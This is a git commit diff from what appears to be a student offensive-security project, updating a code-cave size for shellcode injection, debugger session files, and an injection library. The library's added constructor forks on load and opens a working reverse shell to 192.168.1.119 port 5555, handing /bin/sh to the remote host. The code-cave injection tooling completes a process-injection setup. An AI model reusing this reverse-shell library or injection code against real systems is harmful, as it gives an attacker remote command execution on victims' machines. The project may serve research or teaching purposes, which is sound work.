Updated injection module to ensure shellcode fits in code cave. Added simple reverse shell in injection lib

2025-12-17 07:33:07 +08:00 · 2022-06-11 18:38:48 -04:00
parent e697dc867d
commit d7a9b0e777
14 changed files with 67 additions and 32 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,6 @@
 src/log
 *.aux
-*bcf
+*/document.bcf
 *.blg
 *.fdb_latexmk
 *.fls
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/helpers/.gdb_history
+++ b/src/helpers/.gdb_history
@@ -1,31 +1,3 @@
-q
-checksec
-q
-disass main
-b *(main+446)
-r
-si
-ni
-si
-ni
-si
-q
-b *(main+446)
-r
-x/20i 0x7ffff7ede560
-x/100i 0x7ffff7ede560
-x/1000i 0x7ffff7ede560
-q
-b *(main+446)
-r
-si
-disass /r 0x555555555130
-x/20b 0x555555557fd0
-q
-b timerfd_settime@plt
-r
-si
-q
 disass /r 0x555555555130
 b timerfd_settime
 r
@@ -254,3 +226,31 @@ si
 q
 r
 q
+b *(main+186)
+r
+x/x *(main+186)
+si
+x/4x 0x555555555130 
+q
+disass main
+b *(main+52)
+r
+si
+disass main
+b *(main+79)
+r
+c
+si
+q
+r
+q
+r
+q
+r
+r
+q
+b *(main+79)
+r
+si
+ni
+q
--- a/src/helpers/injection_lib.c
+++ b/src/helpers/injection_lib.c
@@ -1,10 +1,38 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <syslog.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+

 __attribute__((constructor))
 static void init()
 {
    printf("Library successfully injected!\n");
    syslog(LOG_CRIT, "Library called\n");
+    
+    //Just a sample reverse shell (https://www.revshells.com/)
+    pid_t pid = fork();
+    if(pid==0){
+        int port = 5555;
+        struct sockaddr_in revsockaddr;
+
+        int sockt = socket(AF_INET, SOCK_STREAM, 0);
+        revsockaddr.sin_family = AF_INET;       
+        revsockaddr.sin_port = htons(port);
+        revsockaddr.sin_addr.s_addr = inet_addr("192.168.1.119");
+
+        connect(sockt, (struct sockaddr *) &revsockaddr, 
+        sizeof(revsockaddr));
+        dup2(sockt, 0);
+        dup2(sockt, 1);
+        dup2(sockt, 2);
+
+        char * const argv[] = {"/bin/sh", NULL};
+        execve("/bin/sh", argv, NULL);
+    }
 }
--- a/src/helpers/injection_lib.o
+++ b/src/helpers/injection_lib.o
--- a/src/helpers/injection_lib.so
+++ b/src/helpers/injection_lib.so
--- a/src/helpers/peda-session-dash.txt
+++ b/src/helpers/peda-session-dash.txt
@@ -0,0 +1,3 @@
+break *(main+79)
+disable $bpnum
+
--- a/src/helpers/peda-session-ls.txt
+++ b/src/helpers/peda-session-ls.txt
@@ -0,0 +1,3 @@
+break *(main+79)
+disable $bpnum
+
--- a/src/helpers/peda-session-simple_open.txt
+++ b/src/helpers/peda-session-simple_open.txt
@@ -1,2 +1,2 @@
-break /home/osboxes/TFG/src/helpers/simple_open.c:14
+break *(main+79)

--- a/src/helpers/simple_open
+++ b/src/helpers/simple_open
--- a/src/helpers/simple_open.c
+++ b/src/helpers/simple_open.c
@@ -15,8 +15,9 @@ int main(int argc, char *argv[]) {
    int fd;
    char* path = "/home/osboxes/TFG/src/helpers/Makefile";
    openat(fd, path, O_RDONLY);
+    sleep(1);
    //Second call
    openat(fd, path, O_RDONLY);
-
+    sleep(1);
   return 0;
 }
--- a/src/helpers/simple_open.o
+++ b/src/helpers/simple_open.o
--- a/src/user/include/utils/mem/code_caver.h
+++ b/src/user/include/utils/mem/code_caver.h
@@ -10,7 +10,7 @@

 #include "../common/constants.h"

-#define CODE_CAVE_LENGTH_BYTES 0x40
+#define CODE_CAVE_LENGTH_BYTES 0xA0
 #define NULL_BYTE 0x00

 __u64 cave_find(int mem_fd, int cave_length, __u64 from, __u64 to){